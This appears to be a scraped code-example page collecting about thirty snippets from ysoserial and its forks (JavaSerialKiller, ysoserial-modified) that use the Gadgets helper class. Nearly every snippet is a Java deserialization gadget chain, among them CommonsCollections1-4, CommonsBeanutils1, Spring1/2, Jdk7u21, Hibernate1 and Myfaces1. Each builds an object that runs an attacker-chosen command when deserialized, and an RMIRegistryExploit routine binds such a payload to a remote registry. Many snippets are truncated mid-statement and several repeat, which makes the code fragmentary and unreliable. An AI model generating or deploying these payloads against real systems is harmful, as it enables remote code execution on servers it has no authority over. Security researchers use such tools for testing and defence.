ysoserial.payloads.util.Gadgets Java Examples

The following examples show how to use ysoserial.payloads.util.Gadgets. You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example #1
Source File: CommonsCollections2.java    From JavaSerialKiller with MIT License 6 votes vote down vote up
public Queue<Object> getObject(final String command) throws Exception {
	final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
	// stub data for replacement later

	// switch method called by comparator
	Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = 1;

	return queue;
Example #2
Source File: CommonsCollections3.java    From ysoserial with MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	Object templatesImpl = Gadgets.createTemplatesImpl(command);

	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
		new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(TrAXFilter.class),
			new InstantiateTransformer(
					new Class[] { Templates.class },
					new Object[] { templatesImpl } )};

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

	final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

	final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

	return handler;
Example #3
Source File: Spring1.java    From ysoserial with MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(command);

	final ObjectFactory objectFactoryProxy =
			Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);

	final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler)
				.newInstance(objectFactoryProxy), Type.class, Templates.class);

	final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
			Gadgets.createMap("getType", typeTemplatesProxy),

	final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
	final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
	Reflections.setFieldValue(mitp, "methodName", "newTransformer");

	return mitp;
Example #4
Source File: CommonsCollections2.java    From ysoserial with MIT License 6 votes vote down vote up
public Queue<Object> getObject(final String command) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
	// stub data for replacement later

	// switch method called by comparator
	Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = 1;

	return queue;
Example #5
Source File: Spring2.java    From ysoserial with MIT License 6 votes vote down vote up
public Object getObject ( final String command ) throws Exception {
    final Object templates = Gadgets.createTemplatesImpl(command);

    AdvisedSupport as = new AdvisedSupport();
    as.setTargetSource(new SingletonTargetSource(templates));

    final Type typeTemplatesProxy = Gadgets.createProxy(
        (InvocationHandler) Reflections.getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as),

    final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
        Gadgets.createMap("getType", typeTemplatesProxy),

    Object mitp = Reflections.createWithoutConstructor(forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"));
    Reflections.setFieldValue(mitp, "provider", typeProviderProxy);
    Reflections.setFieldValue(mitp, "methodName", "newTransformer");
    return mitp;
Example #6
Source File: RMIRegistryExploit.java    From ysoserial with MIT License 6 votes vote down vote up
public static void exploit(final Registry registry,
		final Class<? extends ObjectPayload> payloadClass,
		final String command) throws Exception {
	new ExecCheckingSecurityManager().callWrapped(new Callable<Void>(){public Void call() throws Exception {
		ObjectPayload payloadObj = payloadClass.newInstance();
           Object payload = payloadObj.getObject(command);
		String name = "pwned" + System.nanoTime();
		Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
		try {
			registry.bind(name, remote);
		} catch (Throwable e) {
		Utils.releasePayload(payloadObj, payload);
		return null;
Example #7
Source File: CommonsBeanutilsCollectionsLogging1.java    From JavaSerialKiller with MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final BeanComparator comparator = new BeanComparator("lowestSetBit");

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
	// stub data for replacement later
	queue.add(new BigInteger("1"));
	queue.add(new BigInteger("1"));

	// switch method called by comparator
	Reflections.setFieldValue(comparator, "property", "outputProperties");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = templates;

	return queue;
Example #8
Source File: Jdk7u21.java    From JavaSerialKiller with MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);

	String zeroHashCodeStr = "f5a5a608";

	HashMap map = new HashMap();
	map.put(zeroHashCodeStr, "foo");

	InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
	Reflections.setFieldValue(tempHandler, "type", Templates.class);
	Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

	LinkedHashSet set = new LinkedHashSet(); // maintain order

	Reflections.setFieldValue(templates, "_auxClasses", null);
	Reflections.setFieldValue(templates, "_class", null);

	map.put(zeroHashCodeStr, templates); // swap in real object

	return set;
Example #9
Source File: CommonsBeanutils1.java    From ysoserial with MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(command);
	// mock method name until armed
	final BeanComparator comparator = new BeanComparator("lowestSetBit");

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
	// stub data for replacement later
	queue.add(new BigInteger("1"));
	queue.add(new BigInteger("1"));

	// switch method called by comparator
	Reflections.setFieldValue(comparator, "property", "outputProperties");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = templates;

	return queue;
Example #10
Source File: CommonsCollections3.java    From JavaSerialKiller with MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	TemplatesImpl templatesImpl = Gadgets.createTemplatesImpl(command);

	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
		new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(TrAXFilter.class),
			new InstantiateTransformer(
					new Class[] { Templates.class },
					new Object[] { templatesImpl } )};

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

	final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

	final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

	return handler;
Example #11
Source File: Spring1.java    From JavaSerialKiller with MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
	final ObjectFactory objectFactoryProxy = 
			Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);
	final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) 
				.newInstance(objectFactoryProxy), Type.class, Templates.class);
	final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
			Gadgets.createMap("getType", typeTemplatesProxy), 
	final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
	final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
	Reflections.setFieldValue(mitp, "methodName", "newTransformer");

	return mitp;
Example #12
Source File: Hibernate1.java    From ysoserial-modified with MIT License 6 votes vote down vote up
static Object makeCaller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
        InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
    PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
    Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);

    ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
    Reflections.setFieldValue(t, "componentTuplizer", tup);
    Reflections.setFieldValue(t, "propertySpan", 1);
    Reflections.setFieldValue(t, "propertyTypes", new Type[] {

    TypedValue v1 = new TypedValue(t, null);
    Reflections.setFieldValue(v1, "value", tpl);
    Reflections.setFieldValue(v1, "type", t);

    TypedValue v2 = new TypedValue(t, null);
    Reflections.setFieldValue(v2, "value", tpl);
    Reflections.setFieldValue(v2, "type", t);

    return Gadgets.makeMap(v1, v2);
Example #13
Source File: Jdk7u21.java    From ysoserial with MIT License 6 votes vote down vote up
public Object getObject(final String command) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(command);

	String zeroHashCodeStr = "f5a5a608";

	HashMap map = new HashMap();
	map.put(zeroHashCodeStr, "foo");

	InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
	Reflections.setFieldValue(tempHandler, "type", Templates.class);
	Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

	LinkedHashSet set = new LinkedHashSet(); // maintain order

	Reflections.setFieldValue(templates, "_auxClasses", null);
	Reflections.setFieldValue(templates, "_class", null);

	map.put(zeroHashCodeStr, templates); // swap in real object

	return set;
Example #14
Source File: Jdk7u21.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public Object getObject(CmdExecuteHelper cmdHelper) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

	String zeroHashCodeStr = "f5a5a608";

	HashMap map = new HashMap();
	map.put(zeroHashCodeStr, "foo");

	InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
	Reflections.setFieldValue(tempHandler, "type", Templates.class);
	Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

	LinkedHashSet set = new LinkedHashSet(); // maintain order

	Reflections.setFieldValue(templates, "_auxClasses", null);
	Reflections.setFieldValue(templates, "_class", null);

	map.put(zeroHashCodeStr, templates); // swap in real object

	return set;
Example #15
Source File: CommonsCollections2.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public Queue<Object> getObject(CmdExecuteHelper cmdHelper) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());
	// mock method name until armed
	final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
	// stub data for replacement later

	// switch method called by comparator
	Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = 1;

	return queue;
Example #16
Source File: RMIRegistryExploit.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public static void exploit(final Registry registry,
		final Class<? extends ObjectPayload> payloadClass,
		final String terminalType,
		final String command) throws Exception {
	new ExecCheckingSecurityManager().wrap(new Callable<Void>(){public Void call() throws Exception {
		ObjectPayload payloadObj = payloadClass.newInstance();
		CmdExecuteHelper cmdHelper = new CmdExecuteHelper(terminalType, command);
           Object payload = payloadObj.getObject(cmdHelper);
		String name = "pwned" + System.nanoTime();
		Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
		try {
			registry.bind(name, remote);
		} catch (Throwable e) {
		Utils.releasePayload(payloadObj, payload);
		return null;
Example #17
Source File: CommonsBeanutils1.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public Object getObject(CmdExecuteHelper cmdHelper) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());
	// mock method name until armed
	final BeanComparator comparator = new BeanComparator("lowestSetBit");

	// create queue with numbers and basic comparator
	final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
	// stub data for replacement later
	queue.add(new BigInteger("1"));
	queue.add(new BigInteger("1"));

	// switch method called by comparator
	Reflections.setFieldValue(comparator, "property", "outputProperties");

	// switch contents of queue
	final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
	queueArray[0] = templates;
	queueArray[1] = templates;

	return queue;
Example #18
Source File: Spring1.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public Object getObject(CmdExecuteHelper cmdHelper) throws Exception {
	final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());
	final ObjectFactory objectFactoryProxy = 
			Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);
	final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) 
				.newInstance(objectFactoryProxy), Type.class, Templates.class);
	final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
			Gadgets.createMap("getType", typeTemplatesProxy), 
	final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
	final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
	Reflections.setFieldValue(mitp, "methodName", "newTransformer");

	return mitp;
Example #19
Source File: CommonsCollections3.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public Object getObject(CmdExecuteHelper cmdHelper) throws Exception {
	Object templatesImpl = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
		new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(TrAXFilter.class),
			new InstantiateTransformer(
					new Class[] { Templates.class },
					new Object[] { templatesImpl } )};

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

	final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

	final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

	return handler;
Example #20
Source File: Spring2.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public Object getObject ( CmdExecuteHelper cmdHelper ) throws Exception {
    final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

    AdvisedSupport as = new AdvisedSupport();
    as.setTargetSource(new SingletonTargetSource(templates));

    final Type typeTemplatesProxy = Gadgets.createProxy(
        (InvocationHandler) Reflections.getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as),

    final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
        Gadgets.createMap("getType", typeTemplatesProxy),

    Object mitp = Reflections.createWithoutConstructor(forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"));
    Reflections.setFieldValue(mitp, "provider", typeProviderProxy);
    Reflections.setFieldValue(mitp, "methodName", "newTransformer");
    return mitp;
Example #21
Source File: Hibernate1.java    From ysoserial with MIT License 6 votes vote down vote up
static Object makeHibernate45Caller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
        InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
    PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
    Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);

    ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
    Reflections.setFieldValue(t, "componentTuplizer", tup);
    Reflections.setFieldValue(t, "propertySpan", 1);
    Reflections.setFieldValue(t, "propertyTypes", new Type[] {

    TypedValue v1 = new TypedValue(t, null);
    Reflections.setFieldValue(v1, "value", tpl);
    Reflections.setFieldValue(v1, "type", t);

    TypedValue v2 = new TypedValue(t, null);
    Reflections.setFieldValue(v2, "value", tpl);
    Reflections.setFieldValue(v2, "type", t);

    return Gadgets.makeMap(v1, v2);
Example #22
Source File: JSON1.java    From ysoserial with MIT License 5 votes vote down vote up
 * Will call all getter methods on payload that are defined in the given interfaces
public static Map makeCallerChain ( Object payload, Class... ifaces ) throws OpenDataException, NoSuchMethodException, InstantiationException,
        IllegalAccessException, InvocationTargetException, Exception, ClassNotFoundException {
    CompositeType rt = new CompositeType("a", "b", new String[] {
    }, new String[] {
    }, new OpenType[] {
    TabularType tt = new TabularType("a", "b", rt, new String[] {
    TabularDataSupport t1 = new TabularDataSupport(tt);
    TabularDataSupport t2 = new TabularDataSupport(tt);

    // we need to make payload implement composite data
    // it's very likely that there are other proxy impls that could be used
    AdvisedSupport as = new AdvisedSupport();
    InvocationHandler delegateInvocationHandler = (InvocationHandler) Reflections.newInstance("org.springframework.aop.framework.JdkDynamicAopProxy", as);
    InvocationHandler cdsInvocationHandler = Gadgets.createMemoizedInvocationHandler(Gadgets.createMap("getCompositeType", rt));
    InvocationHandler invocationHandler = (InvocationHandler) Reflections.newInstance("com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl");
    ((Map) Reflections.getFieldValue(invocationHandler, "classToInvocationHandler")).put(CompositeData.class, cdsInvocationHandler);
    Reflections.setFieldValue(invocationHandler, "defaultHandler", delegateInvocationHandler);
    final CompositeData cdsProxy = Gadgets.createProxy(invocationHandler, CompositeData.class, ifaces);

    JSONObject jo = new JSONObject();
    Map m = new HashMap();
    m.put("t", cdsProxy);
    Reflections.setFieldValue(jo, "properties", m);
    Reflections.setFieldValue(jo, "properties", m);
    Reflections.setFieldValue(t1, "dataMap", jo);
    Reflections.setFieldValue(t2, "dataMap", jo);
    return Gadgets.makeMap(t1, t2);
Example #23
Source File: Vaadin1.java    From ysoserial with MIT License 5 votes vote down vote up
public Object getObject (String command) throws Exception
    Object templ = Gadgets.createTemplatesImpl (command);
    PropertysetItem pItem = new PropertysetItem ();        
    NestedMethodProperty<Object> nmprop = new NestedMethodProperty<Object> (templ, "outputProperties");
    pItem.addItemProperty ("outputProperties", nmprop);
    BadAttributeValueExpException b = new BadAttributeValueExpException ("");
    Reflections.setFieldValue (b, "val", pItem);
    return b;
Example #24
Source File: CommonsCollections1.java    From ysoserial with MIT License 5 votes vote down vote up
public InvocationHandler getObject(final String command) throws Exception {
	final String[] execArgs = new String[] { command };
	// inert chain for setup
	final Transformer transformerChain = new ChainedTransformer(
		new Transformer[]{ new ConstantTransformer(1) });
	// real chain for after setup
	final Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(Runtime.class),
			new InvokerTransformer("getMethod", new Class[] {
				String.class, Class[].class }, new Object[] {
				"getRuntime", new Class[0] }),
			new InvokerTransformer("invoke", new Class[] {
				Object.class, Object[].class }, new Object[] {
				null, new Object[0] }),
			new InvokerTransformer("exec",
				new Class[] { String.class }, execArgs),
			new ConstantTransformer(1) };

	final Map innerMap = new HashMap();

	final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

	final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

	final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

	Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

	return handler;
Example #25
Source File: JSON1.java    From ysoserial-modified with MIT License 5 votes vote down vote up
 * Will call all getter methods on payload that are defined in the given interfaces
public static Map makeCallerChain ( Object payload, Class... ifaces ) throws OpenDataException, NoSuchMethodException, InstantiationException,
        IllegalAccessException, InvocationTargetException, Exception, ClassNotFoundException {
    CompositeType rt = new CompositeType("a", "b", new String[] {
    }, new String[] {
    }, new OpenType[] {
    TabularType tt = new TabularType("a", "b", rt, new String[] {
    TabularDataSupport t1 = new TabularDataSupport(tt);
    TabularDataSupport t2 = new TabularDataSupport(tt);

    // we need to make payload implement composite data
    // it's very likely that there are other proxy impls that could be used
    AdvisedSupport as = new AdvisedSupport();
    InvocationHandler delegateInvocationHandler = (InvocationHandler) Reflections
    InvocationHandler cdsInvocationHandler = Gadgets.createMemoizedInvocationHandler(Gadgets.createMap("getCompositeType", rt));
    CompositeInvocationHandlerImpl invocationHandler = new CompositeInvocationHandlerImpl();
    invocationHandler.addInvocationHandler(CompositeData.class, cdsInvocationHandler);
    final CompositeData cdsProxy = Gadgets.createProxy(invocationHandler, CompositeData.class, ifaces);

    JSONObject jo = new JSONObject();
    Map m = new HashMap();
    m.put("t", cdsProxy);
    Reflections.setFieldValue(jo, "properties", m);
    Reflections.setFieldValue(jo, "properties", m);
    Reflections.setFieldValue(t1, "dataMap", jo);
    Reflections.setFieldValue(t2, "dataMap", jo);
    return Gadgets.makeMap(t1, t2);
Example #26
Source File: Myfaces1.java    From ysoserial-modified with MIT License 5 votes vote down vote up
public static Object makeExpressionPayload ( String expr ) throws IllegalArgumentException, IllegalAccessException, Exception  {
    FacesContextImpl fc = new FacesContextImpl((ServletContext) null, (ServletRequest) null, (ServletResponse) null);
    ELContext elContext = new FacesELContext(new CompositeELResolver(), fc);
    Reflections.getField(FacesContextImplBase.class, "_elContext").set(fc, elContext);
    ExpressionFactory expressionFactory = ExpressionFactory.newInstance();
    ValueExpression ve1 = expressionFactory.createValueExpression(elContext, expr, Object.class);
    ValueExpressionMethodExpression e = new ValueExpressionMethodExpression(ve1);
    ValueExpression ve2 = expressionFactory.createValueExpression(elContext, "${true}", Object.class);
    ValueExpressionMethodExpression e2 = new ValueExpressionMethodExpression(ve2);

    return Gadgets.makeMap(e2, e);
Example #27
Source File: CommonsCollections4.java    From ysoserial with MIT License 5 votes vote down vote up
public Queue<Object> getObject(final String command) throws Exception {
	Object templates = Gadgets.createTemplatesImpl(command);

	ConstantTransformer constant = new ConstantTransformer(String.class);

	// mock method name until armed
	Class[] paramTypes = new Class[] { String.class };
	Object[] args = new Object[] { "foo" };
	InstantiateTransformer instantiate = new InstantiateTransformer(
			paramTypes, args);

	// grab defensively copied arrays
	paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
	args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

	ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

	// create queue with numbers
	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));

	// swap in values to arm
	Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
	paramTypes[0] = Templates.class;
	args[0] = templates;

	return queue;
Example #28
Source File: Myfaces1.java    From ysoserial with MIT License 5 votes vote down vote up
public static Object makeExpressionPayload ( String expr ) throws IllegalArgumentException, IllegalAccessException, Exception  {
    FacesContextImpl fc = new FacesContextImpl((ServletContext) null, (ServletRequest) null, (ServletResponse) null);
    ELContext elContext = new FacesELContext(new CompositeELResolver(), fc);
    Reflections.getField(FacesContextImplBase.class, "_elContext").set(fc, elContext);
    ExpressionFactory expressionFactory = ExpressionFactory.newInstance();

    ValueExpression ve1 = expressionFactory.createValueExpression(elContext, expr, Object.class);
    ValueExpressionMethodExpression e = new ValueExpressionMethodExpression(ve1);
    ValueExpression ve2 = expressionFactory.createValueExpression(elContext, "${true}", Object.class);
    ValueExpressionMethodExpression e2 = new ValueExpressionMethodExpression(ve2);

    return Gadgets.makeMap(e2, e);
Example #29
Source File: CommonsCollections4.java    From ysoserial-modified with MIT License 5 votes vote down vote up
public Queue<Object> getObject(CmdExecuteHelper cmdHelper) throws Exception {
	Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

	ConstantTransformer constant = new ConstantTransformer(String.class);

	// mock method name until armed
	Class[] paramTypes = new Class[] { String.class };
	Object[] args = new Object[] { "foo" };
	InstantiateTransformer instantiate = new InstantiateTransformer(
			paramTypes, args);

	// grab defensively copied arrays
	paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
	args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

	ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

	// create queue with numbers
	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));

	// swap in values to arm
	Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
	paramTypes[0] = Templates.class;
	args[0] = templates;

	return queue;
Example #30
Source File: CommonsCollections4.java    From JavaSerialKiller with MIT License 5 votes vote down vote up
public Queue<Object> getObject(final String command) throws Exception {
	TemplatesImpl templates = Gadgets.createTemplatesImpl(command);

	ConstantTransformer constant = new ConstantTransformer(String.class);

	// mock method name until armed
	Class[] paramTypes = new Class[] { String.class };
	Object[] args = new Object[] { "foo" };
	InstantiateTransformer instantiate = new InstantiateTransformer(
			paramTypes, args);

	// grab defensively copied arrays
	paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
	args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

	ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

	// create queue with numbers
	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));

	// swap in values to arm
	Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
	paramTypes[0] = Templates.class;
	args[0] = templates;

	return queue;